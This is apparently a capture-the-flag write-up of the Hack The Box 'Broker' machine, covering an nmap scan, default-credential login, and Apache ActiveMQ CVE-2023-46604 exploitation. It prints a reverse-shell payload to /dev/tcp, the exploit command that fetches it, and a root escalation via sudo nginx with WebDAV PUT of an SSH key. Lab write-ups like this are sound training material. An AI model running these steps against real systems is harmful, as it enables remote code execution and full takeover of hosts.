Broker https://app.hackthebox.com/machines/Broker
Nmap scan
Copy PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux ; protocol 2.0 )
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
| _ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| _http-title: Error 401 Unauthorized
| _http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized \x 0D
| _ basic realm=ActiveMQRealm
1883/tcp open mqtt syn-ack
| _mqtt-subscribe: Failed to receive control packet from server.
5672/tcp open amqp? syn-ack
| _amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
| _ 7Connection from client using unsupported AMQP attempted
8161/tcp open http syn-ack Jetty 9.4.39.v20210325
| _http-server-header: Jetty ( 9.4.39.v20210325 )
| http-auth:
| HTTP/1.1 401 Unauthorized \x 0D
| _ basic realm=ActiveMQRealm
| _http-title: Error 401 Unauthorized
40299/tcp open tcpwrapped syn-ack
61613/tcp open stomp syn-ack Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258 )
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85 )
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83 )
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233 )
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215 )
| _ java.lang.Thread.run ( Thread.java:750 )
61614/tcp open http syn-ack Jetty 9.4.39.v20210325
| _http-server-header: Jetty ( 9.4.39.v20210325 )
| _http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| _http-title: Site doesn 't have a title.
| http-methods:
| Supported Methods: GET HEAD TRACE OPTIONS
|_ Potentially risky methods: TRACE
61616/tcp open apachemq syn-ack ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
This machine has 3 http ports open: 80
, 8161
and 61614
Copy └─➜ cat ports.scan| grep 'http ' [0]
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
8161/tcp open http syn-ack Jetty 9.4.39.v20210325
61614/tcp open http syn-ack Jetty 9.4.39.v20210325
Visiting the $IP
we have a basic HTTP Authentication
We logged in with default password : admin:admin
The intresting port was 61616/tcp open apachemq syn-ack ActiveMQ OpenWire transport
which was running activemq openwire transport
This service is vulnerable
Exploitation (User)
Copy sh -i & gt ; & amp ; /dev/tcp/10.10.16.10/9999 0 & gt ; & amp ; 1
I've used the following POC :
https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
change poc-linux.xml
file
Copy <?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<!-- The command below downloads the file and saves it as test.elf -->
<value>sh -i >& /dev/tcp/<YOUR_IP>/9999 0>&1</value>
</list>
</constructor-arg>
</bean>
</beans>
Start a python server with python -m http.server 8001
Copy go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.10:8001/poc-linux.xml
Exploitation (Root)
Copy activemq@broker:~$ sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User activemq may run the following commands on broker:
( ALL : ALL ) NOPASSWD: /usr/sbin/nginx
So we have root permissions on nginx,
i.e we can create a webserver on the box with root privileges.
Refer to the following docs to crate a webserver
Copy activemq@broker:/tmp$ cat heap.conf
user root;
worker_processes auto;
pid /run/nginx6767.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
server{
listen 7878;
location /{
root /;
autoindex on;
}
}
}
And start the nginx server with following cmd
Copy sudo nginx -c /tmp/heap.conf
Copy activemq@broker:/tmp$ curl localhost:7878/root/
< html >
< head><title > Index of /root/ < /title></head >
< body >
< h 1> Index of /root/ < /h1><hr><pre><a href = "../" > ../ < /a >
< a href = "cleanup.sh" > cleanup.sh < /a > 07-Nov-2023 08:15 517
< a href = "root.txt" > root.txt < /a > 10-Nov-2023 06:11 33
< /pre><hr></body >
< /html >
activemq@broker:/tmp$
We can read the files (root.txt)
Beyond root (ippsec way)
If we can create our own server, let's create one where we can put files
The above link specify us about the dav_methods
Copy location / {
root / ;
dav_methods PUT ;
}
Let's put our public key in /root/.ssh/authorized_keys
Copy curl -X PUT http://10.10.11.243:7457/root/.ssh/authorized_keys \
--upload-file ~/.ssh/id_rsa.pub
replace the port(7457) with the port number you used to create the nginx server
Shell
Let's check if our key is been placed
Copy activemq@broker:/tmp$ curl localhost:7878/root/.ssh/
< html >
< head><title > Index of /root/.ssh/ < /title></head >
< body >
< h 1> Index of /root/.ssh/ < /h1><hr><pre><a href = "../" > ../ < /a >
< a href = "authorized_keys" > authorized_keys < /a > 10-Nov-2023 10:36 741
< /pre><hr></body >
< /html >
activemq@broker:/tmp$
As we can see our keys are placed, now just ssh & we have rooooooooot shell
Copy └─➜ ssh root@10.10.11.243 [0]
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64 )
< -- snipped -- >
Last login: Fri Nov 10 10:40:14 2023 from 10.10.14.51
root@broker:~# id
uid = 0 ( root ) gid = 0 ( root ) groups = 0 ( root )
root@broker:~#
PWNED
_______________________heapbytes's still pwning.
Last updated 11 months ago